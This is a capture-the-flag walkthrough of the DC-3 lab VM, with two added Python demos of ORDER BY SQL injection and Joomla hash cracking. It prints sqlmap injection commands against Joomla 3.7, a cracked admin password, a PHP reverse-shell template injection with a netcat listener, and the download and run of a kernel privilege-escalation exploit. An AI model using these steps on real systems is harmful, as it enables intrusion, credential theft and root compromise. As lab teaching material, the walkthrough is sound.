Hello friends! Today we are going to take on another boot2root challenge, “DC-3”. The credit for making this VM goes to “DCAU”; the goal is to get root access and read the final flag. You can download it from here.
Security Level: Beginner
Penetrating Methodology:
· Discovering the target IP
· Network scanning (Nmap)
· Surfing the HTTP service port
· Searching exploits via searchsploit
· Using SQLMAP to dump database information
· Using John the Ripper to crack the password
· Logging into JOOMLA
· Injecting malicious PHP reverse shell code
· Using Netcat to obtain a reverse connection
· Exploiting the kernel
· Getting root access
· Reading the final flag
Let’s start off with scanning the network to find our target.
netdiscover
nmap -A 192.168.1.101
From the nmap result we found that only the HTTP service is open (port 80), and the service banner told us that the Joomla CMS is installed on this website.
So we navigated to port 80 by opening the target IP in the web browser and read the admin's text message; as found above, the site is running on Joomla.
To identify the installed Joomla version we checked its README file, which clearly shows Joomla 3.7. I thought this might come in handy.
We looked for Joomla 3.7 in searchsploit and found a Joomla SQL injection exploit (42033.txt, the com_fields SQL injection, CVE-2017-8917). We copied the exploit file to our machine and read its contents: it gives a sqlmap command along with the vulnerable URL.
We then ran the sqlmap command given below to enumerate the database names. It returned five databases, as shown in the image below, among which I noticed joomladb.
sqlmap -u "http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
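The bug that sqlmap is driving here is an ORDER BY injection: the list[fullordering] value ends up concatenated into the ordering clause of the com_fields query, a position where parameter binding cannot protect you because an ORDER BY target is SQL syntax, not a value. The following is an added example, not code from this write-up or from Joomla, that reproduces the bug class against an in-memory SQLite database: the tables, rows and the "hash" are constructed placeholders, not DC-3 data, and the function names are mine. SQLite has no updatexml(), so in place of the error-based trick from the exploit it uses a boolean oracle (the row order flips depending on whether a condition is true) to pull the admin hash out one character at a time, and puts an allow-list-based fix beside the vulnerable function.

```python
import sqlite3
import string

# Constructed sample data: a minimal stand-in for Joomla's #__users and
# #__fields tables. SECRET_HASH is a placeholder, not a real bcrypt digest.
SECRET_HASH = "$2y$10$notARealHash"
USERS = [(42, "admin", SECRET_HASH)]
FIELDS = [(1, "city"), (2, "phone"), (3, "birthday")]

ALLOWED_COLUMNS = {"id", "title"}
ALLOWED_DIRECTIONS = {"ASC", "DESC"}


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("CREATE TABLE fields (id INTEGER, title TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    conn.executemany("INSERT INTO fields VALUES (?, ?)", FIELDS)
    return conn


def vulnerable_list_fields(conn, fullordering):
    # The bug class: a user-controlled ordering string is concatenated
    # straight into ORDER BY, so it is parsed as SQL, not as a value.
    return conn.execute(f"SELECT id, title FROM fields ORDER BY {fullordering}").fetchall()


def safe_list_fields(conn, fullordering):
    # Hardened form: parse "column [direction]" and check both parts against
    # an allow-list before anything is interpolated into the query.
    parts = fullordering.split()
    if len(parts) not in (1, 2):
        raise ValueError("bad ordering")
    column = parts[0]
    direction = parts[1].upper() if len(parts) == 2 else "ASC"
    if column not in ALLOWED_COLUMNS or direction not in ALLOWED_DIRECTIONS:
        raise ValueError("ordering not permitted")
    return conn.execute(f"SELECT id, title FROM fields ORDER BY {column} {direction}").fetchall()


def ordering_is_accepted(conn, fullordering):
    try:
        safe_list_fields(conn, fullordering)
        return True
    except ValueError:
        return False


def oracle(conn, condition):
    # True iff `condition` holds: rows then come back by ascending id (first
    # id is 1); otherwise the ordering is negated (first id is 3).
    rows = vulnerable_list_fields(conn, f"CASE WHEN {condition} THEN id ELSE -id END")
    return rows[0][0] == 1


def extract_via_order_by(conn, subquery, charset=string.ascii_letters + string.digits + "$./", max_len=64):
    # Boolean-based extraction through ORDER BY, one character at a time.
    # unicode() compares code points, so the payload needs no quote characters.
    length = next(n for n in range(1, max_len + 1) if oracle(conn, f"length(({subquery})) = {n}"))
    out = ""
    for pos in range(1, length + 1):
        for ch in charset:
            if oracle(conn, f"unicode(substr(({subquery}), {pos}, 1)) = {ord(ch)}"):
                out += ch
                break
        else:
            out += "?"
    return out


if __name__ == "__main__":
    conn = make_db()
    leaked = extract_via_order_by(conn, "SELECT password FROM users WHERE username = 'admin'")
    print("leaked through the ordering clause:", leaked)
    payload = "CASE WHEN 1=1 THEN id ELSE -id END"
    print("hardened version accepts payload:", ordering_is_accepted(conn, payload))
```

The allow-list is the right fix for this class: escaping does nothing for an identifier position, and a bound parameter would make ORDER BY sort by a constant string rather than by the column.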
Let’s use sqlmap again to list the tables of joomladb.
sqlmap -u "http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables --batch
After getting the table names, we dumped the name and password columns of the #__users table with sqlmap, which revealed credentials that come in handy for logging into JOOMLA.
But the password is stored as a hash, not in clear text, so we need to crack it. Time to fire up John.
sqlmap -u "http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C name,password --dump --batch
We saved the hash to a file on our system and used John the Ripper to crack it. Now we have both credentials to log into Joomla.
Username- admin
Password- snoopy
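Joomla 3.x stores passwords as bcrypt hashes (the $2y$10$... form), which is why the dumped value has to be cracked rather than decoded, and why a real cracker like John is the tool for it. As an added example, not part of this write-up and not output from sqlmap or John, the script below takes a sqlmap-style name,password dump, labels each hash by scheme, cracks the cheap legacy Joomla md5(password + salt):salt format in place with a small wordlist, and emits user:hash lines ready for John for the bcrypt entries. The dump, salt, wordlist and the bcrypt-shaped placeholder are constructed; the placeholder is not a real digest.

```python
import csv
import hashlib
import io
import re


def legacy_joomla_hash(password, salt):
    # Joomla 1.5/2.5 (before 2.5.18) scheme: md5(password + salt), stored as "hex:salt".
    return hashlib.md5((password + salt).encode()).hexdigest() + ":" + salt


# Constructed sqlmap-style CSV dump of name,password. The bcrypt value is a
# placeholder with the shape of a Joomla 3.x hash, not a genuine digest.
PLACEHOLDER_BCRYPT = "$2y$10$" + "A" * 22 + "B" * 31
LEGACY_SALT = "kQ3pZ9rT"  # constructed
SAMPLE_DUMP = (
    "name,password\n"
    f"admin,{PLACEHOLDER_BCRYPT}\n"
    f"legacyuser,{legacy_joomla_hash('snoopy', LEGACY_SALT)}\n"
)
WORDLIST = ["password", "admin", "joomla", "snoopy"]  # constructed

# Scheme name, recognising pattern, and the cracker mode that handles it.
SCHEMES = [
    ("bcrypt", re.compile(r"^\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}$"), "john --format=bcrypt / hashcat -m 3200"),
    ("joomla-md5-salt", re.compile(r"^[0-9a-f]{32}:[A-Za-z0-9]+$"), "hashcat -m 11"),
]


def classify(hash_str):
    for name, pattern, tools in SCHEMES:
        if pattern.match(hash_str):
            return name, tools
    return "unknown", ""


def crack_legacy(hash_str, wordlist):
    # Cheap to attack: one MD5 round per candidate, salt is stored in the clear.
    digest, salt = hash_str.split(":", 1)
    for word in wordlist:
        if hashlib.md5((word + salt).encode()).hexdigest() == digest:
            return word
    return None


def triage(dump_text, wordlist):
    # Parse the dump, label every hash, crack what is cheap here and hand the
    # expensive ones to John as "user:hash" lines.
    results, john_lines = {}, []
    for row in csv.DictReader(io.StringIO(dump_text)):
        scheme, tools = classify(row["password"])
        entry = {"scheme": scheme, "tools": tools, "password": None}
        if scheme == "joomla-md5-salt":
            entry["password"] = crack_legacy(row["password"], wordlist)
        elif scheme != "unknown":
            john_lines.append(f"{row['name']}:{row['password']}")
        results[row["name"]] = entry
    return results, john_lines


if __name__ == "__main__":
    results, john_lines = triage(SAMPLE_DUMP, WORDLIST)
    for user, entry in results.items():
        print(user, entry)
    print("\n".join(john_lines))  # save this and run: john --format=bcrypt <file>
```

bcrypt at cost factor 10 is deliberately slow, so for the $2y$ entries a short, targeted wordlist matters far more than it does for the single-round md5 scheme, where even a large list is cheap.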
Let’s log in to Joomla as admin.
After spending some time exploring, we got the idea of adding malicious PHP code (a PHP reverse shell, available in Kali under /usr/share/webshells/php) to the index.php of the beez3 template, so that loading the template gives us a reverse shell, as shown below.
On the other side, we set up a netcat listener. Upon execution, we got a shell on the target system.
To get a proper shell, we used the Python one-liner to spawn a TTY shell.
nc -lvp 1234
python -c 'import pty;pty.spawn("/bin/bash")'
uname -a
lsb_release -a
From the LSB description we knew that this version of Ubuntu (16.04) has a well-known kernel privilege escalation exploit that can be used to get root access and read the final flag. Kernel exploits can crash a target that does not match, so compare the uname -a output against the kernel range the exploit states before running it.
Without wasting time, we found the privilege escalation exploit for Ubuntu 16.04 (Exploit-DB 39772, the bpf double-fdput exploit). We downloaded the 39772.zip archive to /tmp and extracted it.
cd /tmp
wget https://www.exploit-db.com/exploits/39772
unzip 39772.zip
ls
cd 39772
ls
tar -xvf exploit.tar
After compiling and running the exploit we easily got root access, and with it our final flag.
ls
cd ebpf_mapfd_doubleput_exploit
ls
./compile.sh
ls
./doubleput
cd /root
ls
cat the-flag.txt